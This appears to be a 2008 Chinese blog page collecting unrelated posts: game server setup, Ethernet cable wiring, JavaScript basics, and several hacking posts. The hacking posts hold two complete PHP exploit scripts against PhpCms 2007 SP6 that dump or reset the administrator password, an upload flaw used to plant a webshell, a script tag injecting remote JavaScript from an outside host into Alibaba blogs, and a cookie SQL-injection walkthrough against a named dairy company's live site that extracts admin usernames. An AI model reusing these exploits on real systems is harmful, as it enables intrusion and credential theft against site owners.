CS设置命令详解
2008年10月31日星期五 | | 0 评论 | CS设置命令详解 2008-03-31 23:28
我的QQ空间 CS设置命令详解 搭建: 1、下载hlds_v1120.exe,并安装到D:\HLServer目录下。 2... |
CS设置命令详解 2008-03-31 23:28
我的QQ空间 CS设置命令详解 搭建: 1、下载hlds_v1120.exe,并安装到D:\HLServer目录下。 2... |
双绞线有8根芯线,但在目前广泛使用的百兆网络中,实际上只用到了其中的4根,即第1、第2、第3、第6,它们分别起着收、发信号的作用。于是有了新奇的4芯网线的制作,也可以叫做1-3、2-6交叉接法,这种交叉网线的芯线排列规则是:网线一端的第1脚连另一端的第3脚,网线一端的第2脚连另一端的第6脚,其他脚一一对应即可,也就是把多余的4根线抛开不要。100M的网卡中有8根弹片,四根用于数据传输,另四根用于防串扰,严格按照规范做线能减少网络故障。 直连:两端都做成T568B或T568A。用于不同设备相连(如网卡到交换机)。 交叉:一端做成T568B一端做成T568A。用于同种设备相连(如网卡到网卡)。 1 输出数据 (+) 2 输出数据 (-) 3 输入数据 (+) 4 保留为电话使用 5 保留为电话使用 6 输入数据 (-) 7 保留为电话使用 8 保留为电话使用 正线(标准568B): 两端线序一样,线序是:白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。连线顺序从左到右依次为:1-橙白、2-橙、3-绿白、4-蓝、5-蓝白、6-绿、7-棕白、8-棕。 反线(568A): 一端为正线的线序,另一端为:白绿,绿,白橙,蓝,白蓝,橙,白棕,棕。连线顺序从左到右依次为:1-绿白、2-绿、3-橙白、4-蓝、5-蓝白、6-橙、7-棕白、8-棕。 ◆PC连HUB A端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 ●PC连PC A端:(568A): 白绿,绿,白橙,蓝,白蓝,橙,白棕,棕; B端:(标准568B):白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 ■HUB连HUB A端:(568A): 白绿,绿,白橙,蓝,白蓝,橙,白棕,棕; B端:(568B): 白橙,橙,白绿,蓝,白蓝,绿,白棕,棕。 千兆5类或超5类(包括6类线)双绞线的形式与百兆网线的形式相同,也分为直通和交叉两种。直通网线与我们平时所使用的没有什么区别,都是一一对应的。但是传统的百兆网络只用到4 根线缆来传输,而千兆网络要用到8 根来传输,所以千兆交叉网线的制作与百兆不同,制作方法如下: 1对3,2对6,3对1,4对7,5对8,6对2,7对4,8对5。 例如: 一端为:白橙、橙,白绿、蓝,白蓝、绿,白棕、棕; 另一端:白绿、绿,白橙、白棕、棕,橙,蓝,白蓝; |
表情符号介绍
|
eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。 原理: 代码 <form id="post" encType="server"> "uploadfile" style="file" size="uploadfile" runat= "lbtnUpload" runat= "JavaScript"> 只是简单的对ID进行验证 只要构造javascript:lbtnUpload.click();满足条件 达到上传木马的效果 成功以后查看源代码 代码 a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</> 木马的具体地址为 /eWebEditorNet/UploadFile/200801141044412198.cer 这样就轻松的拿下了一个网站。 |
漏洞存在于ask/search.php文件,以下是漏洞代码: if($keywords) { $where .= " AND title LIKE '%$keywords%'"; } $infos = $ask->listinfo($where, 'askid DESC', $page, 20); 下面我们来看看listinfo()过程的代码: function listinfo($where = '', $order = '', $page = 1, $pagesize = 50) { if($where) $where = " Where $where"; if($order) $order = " orDER BY $order"; $page = max(intval($page), 1); $offset = $pagesize*($page-1); $limit = " LIMIT $offset, $pagesize"; $r = $this->db->get_one("Select count(*) as number FROM $this->table $where"); Oh yeah!!注射漏洞就这么产生了,以下是测试语句: http://demo.phpcms.cn/ask/search.php?keywords=蟎' |
<? print_r(' -------------------------------------------------------------------------------- PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit BY T00ls(www.T00ls.net) -------------------------------------------------------------------------------- '); if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; } function getrand($i) { for($j=0;$j<=$i-1;$j++) { srand((double)microtime()*1000000); $randname=rand(!$j ? 1: 0,9); $randnum.=$randname; } return $randnum; } function sendpacketii($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo 'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $prefix="phpcms_"; $cookie="PHPSESSID=2456c055c52722efa1268504d07945f2"; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} /*get $prefix*/ $packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=1/**/union/**/select HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (eregi("in your SQL syntax",$html)) { $temp=explode("From ",$html); if(isset($temp[1])){$temp2=explode("product",$temp[1]);} if($temp2[0]) $prefix=$temp2[0]; echo "[+]prefix -> ".$prefix."\n"; } echo "[~]exploting now,plz waiting\r\n"; $packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=".getrand(6)."/**/union/**/all/**/select%201,2,3,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20userid=1# HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!eregi(chr(181).chr(227).chr(187).chr(247),$html)) { echo $packet; echo $html; die("Exploit failed..."); } else { $pattern="/<a href=\"\/(.*?)\">/si"; preg_match($pattern,$html,$pg); $result=explode("|",$pg[1]); print_r(' -------------------------------------------------------------------------------- [+]username -> '.$result[0].' [+]password(md5 32λ) -> '.$result[1].' -------------------------------------------------------------------------------- '); } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($result[1])) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?> 我在补上Ryat 贴出来可以update管理员密码的EXP #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Phpcms 2007 SP6 reset admin password exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by Phpcms 2007" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 4) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user host: target server (ip/hostname) path: path to phpcms user: admin login name Example: php '.$argv[0].' localhost /phpcms/ admin +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $url = 'http://'.$host.$path.'member/member.php?username='.$user; send(); if (strpos(file_get_contents($url), 'puret_t') !== false) exit("Expoilt Success!\nAdmin New Password:\t123456\n"); else exit("Exploit Failed!\n"); function send() { global $host, $path, $user; $cmd = 'digg_mod=admin,(Select/**/1/**/AS/**/credit_on,0x'.bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1 Where username=\''.$user.'\'#').'/**/AS/**/credit,0x'.bin2hex('\' UNION Select 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6'; $message = "POST ".$path."digg/digg_add.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "CLIENT-IP: ".time()."\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> |
文章作者:攻击者 信息来源:安全警戒线 www.hackeroo.com 文章备注:已经给马云发E-MAIL 在阿里巴巴网商博客中允许我们填加阿里妈妈的广告,但是他却没有过滤掉除了阿里妈妈以外的地址,从而可以使用JS挂马,简单的不能在简单的利用方法: [code]<script type="text/JavaScript"> alimama_pid="mm_10031051_1309365_2877941"; alimama_titlecolor="0000FF"; alimama_descolor ="000000"; alimama_bgcolor="FFFFFF"; alimama_bordercolor="E6E6E6"; alimama_linkcolor="008000"; alimama_bottomcolor="FFFFFF"; alimama_anglesize="0"; alimama_bgpic="0"; alimama_icon="0"; alimama_sizecode="22"; alimama_width=120; alimama_height=240; alimama_type=2; </script> <script src="http://a.alimama.cn/js.js" type=text/javascript></script> <script src="http://www.winshell.cn/js.js" type=text/javascript></script>[/code] <div class="tags" style="display: block">Tags: 阿里巴巴 , 网商 , 博客 , 恶意 , 代码[/code] [/code] |
由于一直改人家做好的,感觉总是不那么尽善尽美,所以自己先学下基础,先弄这些其他随着学习慢慢来! 1.学习简单的输出! <script type="text/javascript"> document.write("Hello World!"); </script> 2.防止不支持js的浏览器显示出来! <script type="text/javascript"> document.write("Hello World!"); // </script> 3.页面弹出提示! <script type="text/javascript">alert("错误提示!")</script> 4.外部调用js文件. <script src="/js/test.js"> 5.动作来触发弹出提示! <script type="text/javascript"> function message() { alert("错误提示!") } </script> </head> <body onload="message()"> 6.输出html内容 <script type="text/javascript"> { document.write("<h1>This is a header</h1>"); document.write("<p>This is a paragraph</p>"); document.write("<p>This is another paragraph</p>"); } </script> 6.js常见方式注释 <script type="text/javascript"> // 这行代码输出标题: document.write("<h1>This is a header</h1>"); // 这行代码输出段落: document.write("<p>This is a paragraph</p>");//这里以后注释掉 /*document.write("<p>This is another paragraph</p>");这里也注释没了*/ </script> 7.javascript变量一些演示( 加 -减 *乘 /除 累加 --累减): <script type="text/javascript"> var x=1; document.write(x); </script> 结果: 1 <script type="text/javascript"> var x=1; var y=2; var z=x y document.write(z); </script> 结果: 3 <script type="text/javascript"> var x=1; var y=2; var z="x" y; document.write(z); </script> 结果: x2 <script type="text/javascript"> var x=1; var y=2; var z="x" "y"; document.write(z); </script> 结果: xy 9.根据判断条件来输出结果! <script type="text/javascript"> var age="1"; if (age<18) document.write("Too young"); else document.write("Too old"); </script> .... 其他陆续学习添加~~~ <div class="tags" style="display: block">Tags: 坏狼 , javascript , 语法 , 学习[/code] [/code] |
<div id='lightbox'>[img width=500]http://www.cnbeta.com/upimg/080920/ugmbbc_142912.jpg[/img][img width=500]http://i3.6.cn/cvbnm/fa/de/8f/253411f99e4ef1bdd395a3f9396f2e9b.jpg[/img][/code] 文章来源:http://www.efsys.cn 蒙牛官方站:http://www.mengniu.com.cn/ [code]三鹿网站被黑.蒙牛被黑.全都是SQL注入.. 今天早上对蒙牛,伊利网站简单检测了下,均存在漏洞,只是懒的研究....懒的研究..现只说下蒙牛的漏洞所在和修补方法 本帅此文只限和广大网络安全爱好者进行学习交流, 本文仅限学习交流使用,利用该文造成任何破坏或触犯法律的事,均与本人无关!!! 废话少说,看官请看: 进入蒙牛网站,看到一搜索框...告诉大家,这搜索框一般都是好东西..嘿嘿..输入1单引号,如# #' 提交.. 错误:0x80040E14 描述:[Microsoft][ODBC SQL Server Driver][SQL Server]第 1 行: '%' 附近有语法错误。 嘎嘎,没有过滤吧..但我对搜索型注入兴趣不大,而且貌似还过滤了其它东东..懒的研究,现在主要说一个更严重的漏洞. 该程序使用通用防注入过滤了地址栏提交的单引号,如: http://www.mengniu.com.cn/qywh_mnqywh.asp?IID=11' 是不可以注入的.但程序员在处理时,仅使用了request("iid")来获取数据,这样造成cookies注入的存在. 为了注入方便,简单写了个利用cookies注入的小程序,基本原理如下: Str="iid="&escape(request("FK")) Url="http://www.mengniu.com.cn/qywh_mnqywh.asp" response.write PostData(Url,Str) Function PostData(PostUrl,PostCok) Dim Http Set Http = Server.CreateObject("msxml2.serverXMLHTTP") With Http .Open "GET",PostUrl,False .SetRequestHeader "Cookie",PostCok .Send PostData = .ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function Function bytes2BSTR(vIn) Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I 1, 1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 CInt(NextCharCode)) I = I 1 End If Next bytes2BSTR = strReturn End Function 好了.来试试 http://localhost/f.asp?fk=11' 返回 > 企业文化> 蒙牛企业文化 > 错误:0x80040E14 描述:[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。 对了,这样就方便多了嘛.. 继续试试? f.asp?fk=11 and 1=(select @@version) 企业文化> 蒙牛企业文化 > 错误:0x80040E07 描述:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.2050 (Intel X86) Mar 7 2008 21:29:56 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' 转换为数据类型为 int 的列时发生语法错误。 中间省略.. http://localhost/f.asp?fk=11 and 1=(select top 1 SysU_Usernaem from sysa_admin) > 企业文化> 蒙牛企业文化 > 错误:0x80040E07 描述:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'admin' 转换为数据类型为 int 的列时发生语法错误。 剩下的大家都知道怎么做了吧..卡卡~~路过路过..没有技术含量的路过... 权限很低..只能改改数据传传木马,大家请勿乱来,请勿乱来... 补充一下,知道后台么?你人品好,我就告诉你..严禁破坏,否则去坐牢,别拉我...我是无辜的哦... 该漏洞修补办法: 请对代码中的request对象进行检查,如果存在 request("iid")等类似用法,请使用clng(request.QueryString("iid")) 对于首页搜索型提交的字符,请使用replace(request.form("newstr"),"'","''") 即可修复此漏洞. 郑重声明:此文章仅限学习和交流,利用本文造成一切后果及法律责任请自负!!!! 蒙牛网站公告被插入"EF到此一游"的字样,与本人无关..我有进过后台,但没有修改数据..呃..这人真坏,快赶上当年的本帅了..不过下次的时候写自己名字,免得本帅被人误会.. [/code] <div class="tags" style="display: block">Tags: 蒙牛 , 网站 , 被黑 , 注入[/code] [/code] |
|
时间:2008年10月14日9:30 我的QQ空间 sdrsf 交谈中请勿轻信汇款、中奖消息,勿轻易拨打陌生电话。小熊<qw... |
所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected] |